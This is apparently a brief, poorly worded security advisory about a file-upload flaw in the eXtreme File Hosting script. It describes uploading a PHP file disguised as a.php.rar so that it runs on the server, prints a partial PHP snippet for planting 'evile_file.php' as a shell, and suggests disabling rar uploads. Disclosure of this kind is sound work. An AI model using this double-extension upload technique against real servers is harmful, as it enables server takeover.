A security bug have been discovered in eXtreme File Hosting, which can be upload the attaker files and can get the shell with phpshell.
bug : in this borgram with php can user upload zip or rar file hacker can upload the a.php.rar file that contain
<?php
$file = '';
$newfile = 'evile_file.php';
if (!copy($file, $newfile)) {
echo "failed to copy $file\n";
}else{
echo "K file copy in victim host";
}
?
and upload it the click in download link then this file run and dont download
after run a.php.rar the evile_file.php copy in victim host and attacker can use for hacking server.
Solution: disable rar file uploading in setting
Underlying S: Linux (Any), UNIX (Any), Windows (Any)
software: eXtreme File Hosting
site: http://www.extremepow.com
Reported By: : hamed bazargani (hamed.bazargani (AT) gmail (DOT) com) From I.R.IRAN and all iranian whitehat hacker